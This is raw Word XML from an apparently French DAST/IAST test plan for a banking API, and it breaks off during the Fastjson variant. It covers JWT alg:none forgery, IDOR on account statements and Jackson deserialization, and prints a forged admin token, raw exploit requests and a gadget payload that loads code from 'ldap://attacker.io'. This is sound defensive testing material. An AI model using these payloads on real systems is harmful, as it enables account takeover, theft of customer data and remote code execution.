              <w:t xml:space="preserve">      │◀───────────────────────│</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JWT forgé — alg:none (payload décodé)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DD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Header (base64url décodé)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">{"alg":"none","typ":"JWT"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Payload (base64url décodé)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">{</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "sub": "1",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "role": "ADMIN",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "userId": "1",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "iat": 1715000000,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "exp": 9999999999</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Signature : vide (supprimée)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Token final : eyJhbGciOiJub25lIn0.eyJzdWIiOiIxIiwicm9sZSI6IkFETUlOIn0.</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Requête HTTP brute — exploitation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GET /api/v1/admin/users HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiIxIiwicm9sZSI6IkFETUlOIn0.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Accept: application/json</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Résultat attendu — détection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444444"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Détecté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444444"/>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Le DAST teste systématiquement : (1) alg:none ; (2) HS256 avec clés faibles dictionnaire (secret, password, 123456, api-key...) ; (3) modification des claims sans re-signer. Détection si la réponse est 200 au lieu de 401. Finding : CWE-347, API2:2023, CVSS 9.1.</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L'IAST détecte si la vérification de signature est absente dans le code (ex : Jwts.parser() sans .setSigningKey()). Peut détecter l'usage de JwtParser en mode permissif. Limite : si la lib valide l'alg côté framework, l'IAST peut ne pas instrumenter ce chemin. Compléter avec un test fonctionnel dédié.</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SCÉNARIO SC-04 — IDOR / BOLA — Accès aux données d'un autre utilisateur</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API1:2023  |  CWE-639</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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:left w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:bottom w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:right w:val="single" w:color="9C1B1B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4CCCC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="22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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">L'API de consultation de relevés de compte utilise l'ID de compte directement dans l'URL sans vérifier que l'utilisateur authentifié est bien propriétaire de ce compte. Un attaquant incrémente l'ID pour accéder aux relevés d'autres clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagramme de séquence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Client légitime (id=42)    API /accounts/{id}    Client victime (id=43)</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Requête légitime                  │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  GET /accounts/42 ────────────────▶│                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  ◀── 200 ses propres données ──────│                        │</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Modifie l'ID dans l'URL           │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  GET /accounts/43 ────────────────▶│                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         │              Vérifie auth │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         │              ✗ pas de     │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         │              vérif. owner │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  ◀── 200 données de la victime ────│                        │</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Requête HTTP brute — attaque DAST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 Requête 1 — accès légitime (token user id=42)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/v1/accounts/42/statements HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer &lt;token_user_42&gt;</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 Requête 2 — IDOR (même token, ID différent)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/v1/accounts/43/statements HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer &lt;token_user_42&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Résultat attendu : 403 — mais retourne 200 + données victime</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Résultat attendu — détection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444444"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Détecté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444444"/>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Le DAST BOLA-aware crée deux comptes de test (user_A, user_B), s'authentifie en tant que user_A et tente d'accéder aux ressources de user_B en incrémentant/modifiant les IDs. Détection si la réponse est 200 avec des données différentes. Exige un mode DAST avec plusieurs identités configurées.</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L'IAST trace : source = PathVariable('accountId') → requête DB sans clause WHERE owner = currentUser(). Détection de l'absence de vérification d'appartenance avant l'accès à la ressource. Finding très précis avec le nom de la méthode et la ligne de code.</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SCÉNARIO SC-05 — Désérialisation Non Sécurisée — DTO API Input</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP A08:2021  |  CWE-502</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Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:left w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:bottom w:val="single" w:color="9C1B1B" w:sz="1"/>
              <w:right w:val="single" w:color="9C1B1B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F4CCCC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="9C1B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="22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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Une API accepte un objet JSON désérialisé en DTO Java via ObjectMapper sans restriction de types. Un attaquant envoie un payload de désérialisation malveillant (ex : gadget chain Jackson/Fastjson) qui déclenche l'exécution de code arbitraire côté serveur lors de la désérialisation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagramme de séquence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/transfers (POST)      Serveur JVM</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POST /transfers       │                       │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  Content-Type: JSON    │                       │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  {"@class":"com.sun.  │                       │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │   org.ProcessBuilder" │                       │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │   "command":["curl",  │                       │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │   "evil.io"]}          │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ObjectMapper.readValue│</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │                       │  (payload) ───────────▶│</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │                       │          Gadget chain  │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │                       │          exécutée ─────│──▶ RCE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │  HTTP 500 (ou 200)    │                        │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      │◀──────────────────────│                        │</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Payload HTTP brut — gadget chain Jackson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POST /api/v1/transfers HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Content-Type: application/json</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w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "@class": "com.sun.rowset.JdbcRowSetImpl",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "dataSourceName": "ldap://attacker.io:1389/exploit",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "autoCommit": true</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">}</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 Variante Fastjson</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
